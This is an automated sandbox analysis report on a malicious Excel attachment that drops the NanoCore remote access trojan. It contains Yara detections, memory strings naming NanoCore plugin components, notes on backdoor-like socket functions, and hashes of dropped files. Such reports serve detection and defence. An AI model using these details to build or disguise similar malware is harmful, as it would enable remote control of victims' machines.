Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

OS version to string mapping found (often used in BOTs)

Source: mmuiqlcvwo.pif	Binary or memory string: WIN_XP
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_XPe
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_VISTA
Source: mmuiqlcvwo.pif.4.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_7
Source: mmuiqlcvwo.pif	Binary or memory string: WIN_8

Remote Access Functionality:

Detected Nanocore Rat

Source: mmuiqlcvwo.pif, 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: mmuiqlcvwo.pif, 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0101C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	5_2_0101C06C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_010265D3 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	5_2_010265D3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01014EFB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	5_2_01014EFB

Windows Analysis Report Import order764536.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	501830
Product:	CloudBasic
Start time:	09:58:13
Start date:	13.10.2021
Sample:	Import order764536.xlsx
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	cf9700bcf6687a0f9bc3b205b43b40ba
SHA1:	1bcc9522f4f8e1938939e2721b834c5f51cf81d1
SHA256:	61c38201d62bd19e606f4f4e78805932442d872aea57651ab949b96bbb6b4121
Filetype:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\33920049\aauo.exe	ASCII text, with CRLF line terminators	3A48081CF7D4D709399A376B3A8AADF2	E0D7DDAA464FC3565D92DF4ECC7BD30286D519CA	7EBB903522348C2326DFFBC66B5D20C8E7C120C4D7CEE15640CAE5187C5741C0
C:\Users\user\33920049\abjtjj.gcm	ASCII text, with very long lines, with no line terminators	1E44C5E2D839F53AC114916DFA41912B	9B67ABC94E2959683B5D784C8B076D6171AF7237	0FB93824D410F1E4BA2B233F405027D042EDF2E729FA34A41BE910B50ED99416
C:\Users\user\33920049\aricevnrq.msc	ASCII text, with CRLF line terminators	AE35EB6B3B57EEB5BED5821AA2E6D92D	9D8C94DEF5AE1D05D727E19EFF0A55917094DD67	565B05521D79388A417C7210739CFC5EB4F8E41E50D0D76D6710FE7533FF4B98
C:\Users\user\33920049\bbofcjswrb.bmp	ASCII text, with CRLF line terminators	152ACD87F50B620928B85D1F6EA00588	5A704ED20090C635BC28A71A343FFF741F482D06	B8F8B30B8BFDFE6E4EBA9D663264F8DE1FEC9A94B1530E0DC13001953324DDEE
C:\Users\user\33920049\dngb.txt	ASCII text, with CRLF line terminators	7F801B2F630068DE6D4B7F9358261246	9F1FA78880CC820B11BF4F50FAF02B47E717F0B8	2BDC81B1E28470666DB0FB6E23AA590C4B9CA2E251170DEB506FAD164B8ADD4A
C:\Users\user\33920049\dopnobhqej.xml	ASCII text, with CRLF line terminators	9F6E0D61C826AC091CD857D118713477	327C7FD7ED8AA08C09C104FFC7BA15894C25424A	44269193851D3CEA2ABBADCD4DF83DEF02397189A74E239D0719D9D2F69BA8FC
C:\Users\user\33920049\dwipjhaqq.jpg	ASCII text, with CRLF line terminators	A36CB4828F8264BF744ABAA2F8842B53	1E0B2BF80891B29BD078129A90364B14ED95EE57	1F7F52165714243C75171CCDA40E5E0C66F8B6EEE59C2F224B9C5033A7D32FE0
C:\Users\user\33920049\eeppjmhbj.icm	ASCII text, with CRLF line terminators	4050A7160604551C4CB625F60086536C	4110CAFA390AE23E74DC5B110CE98F0C3B342CF2	8AE0F3572F5B03EFA9C93C88E62F61DF4C59341817BD5E883E7B0D48A82B2346
C:\Users\user\33920049\egwevtj.xl	ASCII text, with CRLF line terminators	B8B1C71088CA6B30B3029554CE05CEF8	67D1C180AA7C8B079819F9013828827947456D29	A5FC7DBE940C698DE68E900516AE4EA33BC7B7AB2435C0D5B74E9E474A58A09E
C:\Users\user\33920049\ewkvwqles.xl	ASCII text, with CRLF line terminators	A7864C4D1F211A09CB7BCDB60FC1BB9C	06CD14C958FA5C0870C3148BCD874208D6EBA192	D3BEFD3CD87AA43091B2043616C0D57B5DD5C86A9BBB933BC7F1CE359FDF2848
C:\Users\user\33920049\fmkkelc.omp	Little-endian UTF-16 Unicode text, with CRLF line terminators	66D7B16F566AD4D6F73CD6083C7B1D51	C71715B2546908A05A28A91555534F04BDF11432	440D3B688F65BD11C021206C50D7B7C4A75C7BA66BD2E1AA4137ABE65D41079A
C:\Users\user\33920049\ggaoddlfq.pdf	ASCII text, with CRLF line terminators	97DB150F517B42A67914B55B9FCC0855	53FA78E1F13BB71038D02D9C8911415B5C2912C5	D4FC9603286BC88744BDA31D71B8464EA7CAB510244B3C21128774513302BFC8
C:\Users\user\33920049\hmjc.jpg	ASCII text, with CRLF line terminators	DCC53F5459120236A9DD260CBCC7CFFF	4039FCA91DD943A269B6180906E347F44E26AD45	2DD6BC5BC770D576565692E8D014611ECE5614A615B83832756959163EDA3329
C:\Users\user\33920049\ipltm.pdf	ASCII text, with CRLF line terminators	239B0A24A1A86CDB9E336BAFB9671B60	D604B815B4C5FC72E38700E060016980CD3F013C	F71F990B573AA4CC7724769C08F9EF0FD5E3897FDEB567966323E1AA5C7AAF84
C:\Users\user\33920049\kwhibpnou.exe	ASCII text, with CRLF line terminators	D60ADFE8CC5346DF0C2C5A191039AFB7	B2760A6B3E71AA9441F771A31FA7CAB80DDB792C	4D5CB8CFF9DCC0F1536CAE9299295B4422F49B8377FDAA9057427AE40D74EB8B
C:\Users\user\33920049\lueww.jpg	ASCII text, with CRLF line terminators	F25CE49283A8CBCDAE2F3D447B00DE0B	5ED22433392F6FBD1804EF94473CF465837575AD	C6B4F1EA2A48D13050C20A3D4CC3614909E694B494037432610053DA675FC627
C:\Users\user\33920049\lxvjfmbxgn.icm	ASCII text, with CRLF line terminators	B8D1527AD41B6877D1B63609604A2114	831D9DB5D7ED05A8397EE8A3E34C35C3DC769CE0	86DAACE3C786D9AA8BBDBDA09F69456A0260A20E5AB4CFE9A02628A73A9E0AA4
C:\Users\user\33920049\meuuljggm.jpg	ASCII text, with CRLF line terminators	909355BA1B2ADA7E01CB81E2899B6B96	98ED232FB52CB179C60C6988480BB28D5B247263	8ED9F9F9295D32C849D9939BEB83763955BC0C6925793FADB4A0A0735378338A
C:\Users\user\33920049\mmbdcs.xl	ASCII text, with CRLF line terminators	1A4DB14134A67966C903508FF04DCB28	612D22CDCF9CA81EBB295642346E3F0F9214D522	9C66FABC8AC533B56109E3BA00591892A18B30831DE74B933532C5727E0F4AC7
C:\Users\user\33920049\mmuiqlcvwo.pif	PE32 executable (GUI) Intel 80386, for MS Windows	8E699954F6B5D64683412CC560938507	8CA6708B0F158EACCE3AC28B23C23ED42C168C29	C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40
C:\Users\user\33920049\qhqulleu.mp3	ASCII text, with CRLF line terminators	5DC5D3365BAE36FC41072D92D22F69CB	91CE48060DCCCC9806AFB9979A3A1759041036DF	067820A70679BC812C16421E4F759533DD91D8124ED36966436601B1F2013C94
C:\Users\user\33920049\sdstvfk.ico	ASCII text, with CRLF line terminators	84DFE2A08AFBC32793395799841D38E4	1E040C2A1032335F15C39C60A01343A58889B5DC	AC294F23A91818659CFC3210CB058D3D9C7DDA4EF9D4CD933269C8428DED3AC5
C:\Users\user\33920049\srslmbkgam.xml	ASCII text, with CRLF line terminators	B98459F0500F47B7B583B0C519CCF3CB	5D8012DB878B3F72B7A5736525F587330F988A96	E52F7062BE09E0B5653629D3E3738EF2B514BA971CFA25EED7BE051466EE0E26
C:\Users\user\33920049\suktleoxtu.msc	ASCII text, with CRLF line terminators	BA57AA240C24091DC77E1E2EF7A99C10	A013814DFDF3086EA88DBAA42D1D5269CE08DC0D	619C6857EA9C69C098E3AC990BE2B99B25EC1A75821081EAD723C9EF6F718FB2
C:\Users\user\33920049\ujhg.cpl	ASCII text, with CRLF line terminators	5F2BBE62D3EB28228186CD6964305381	46E019DA6F7ECE17D7500B963C80FF076B3B449C	68C1BA695059F1E975FA07FF00BF77FD3B6E56EA4940E9E4AB5F7AA0FA33416E
C:\Users\user\33920049\vusklntwi.docx	ASCII text, with CRLF line terminators	9D55DE9BCF880293EFC22A6EDF63D727	91BFA94E624F6A6C9891922931A650F3BDF014AF	2EF84FFD76915FDBBAF0CC328B1AD11F7F0967D295AC7077F68C44F2DA67B75F
C:\Users\user\33920049\weqn.txt	ASCII text, with CRLF line terminators	E887844DDB3C6BC8C9BA7ABF0963B162	5B1955F3EC2985EDA50632650FB71150AD311794	4E47AFF41CBC53A8C36A9F3446DB8EFCF8B4BADD7808F7B58D57BB6F4082CA1F
C:\Users\user\33920049\wsxedltsm.cpl	ASCII text, with CRLF line terminators	CEE5E8C575EC77654A20CB99615CEBF6	D43519CD61E556D88080FF2640150B2BBE34AE7D	2A4C2DF427A70334733E5CB06304BFF74499D6850AE736F82B06A52B0D850D61
C:\Users\user\33920049\xtax.log	ASCII text, with CRLF line terminators	32834BAFB3B1871301A6BA9BEF2C5687	786CD933E49C5657480DB1485B0609F8DFEC11CE	DF899EAC1B5F6515CBDA8B816319FF0F89D7FF9E4FBDAEC52C75E1505105CD95
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	B866823E1F8F4A52376BD108C457DD78	FE99849EC27630463080445337798EEBA8000A02	EBE1BB18A77CF0B34D3AD06919A9ADFFF2AA69CFAFA5B96B670534B890E3E2A8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\asdERTYgh56F[1].htm	HTML document, ASCII text	4FAA690718E86B391CBF386BAB2C578D	3349E293E3E63929F8EDFCFA93CF393B0BACAC61	F70CAB022EB2B94C482515B83655102FED91D729161C322273C6234B6FF00FDC
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26B84B08.png	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced	9F9A7311810407794A153B7C74AED720	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0CBBE5F.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B908FF69.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDBC2463.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BF7984D4.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C009AF6A.png	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced	9513E5EF8DDC8B0D9C23C4DFD4AEECA2	E7FC283A9529AA61F612EC568F836295F943C8EC	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5A013CD.png	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced	9B8C6AB5CD2CC1A2622CC4BB10D745C0	E3C68E3F16AE0A3544720238440EDCE12DFC900E	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D57D5BFC.png	PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced	66EF10508ED9AE9871D59F267FBE15AA	E40FDB09F7FDA69BD95249A76D06371A851F44A6	461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6B61027.png	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced	9F9A7311810407794A153B7C74AED720	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EC79CE56.png	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced	9B8C6AB5CD2CC1A2622CC4BB10D745C0	E3C68E3F16AE0A3544720238440EDCE12DFC900E	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4E77D3E.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	C222CCD1034332B55B2897F143B03581	FE8FC79E1DE315C4371B5872CDABD5338A2AD5C6	595356BB0D0F0B98BF0D8E41FA5CF1D7EE900F392BC4B3DE0106281357E4A750
C:\Users\user\AppData\Local\Temp\RegSvcs.exe	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows	62CE5EF995FD63A1847A196C2E8B267B	114706D7E56E91685042430F783AE227866AA77F	89F23E31053C39411B4519BF6823969CAD9C7706A94BA7E234B9062ACE229745
C:\Users\user\AppData\Local\Temp\tmp7677.tmp	XML 1.0 document, ASCII text, with CRLF line terminators	8ECDD2338BF1DCD4DDA0C0FB1AA7216B	BA3A56765CF577D12CFDCEC6D1BA79A1425AC65A	E68557FA69E3E09BC76444A92B98313C8BFEA14AB42E581CF4129117702386DC
C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat	data	026FE3A73F30ED51820D936A03AF9C95	62D292056CF26A58D860D75F4C2A98BC4F91EF64	AA1E1FDACFC0C58F21BF51B6F1E54A8B827DC31F6B4F2EDFFEAEFD45E7DE8583
C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat	ASCII text, with no line terminators	274639AEBFFC3A903D57150C8E7E3D80	A5B43DB77933BAC72A1E991DA56128136C776C30	C5E8989F5CE86EB4B4058D058C4F4ADB2D360BB55E2D4152397CF772B1D02E1C
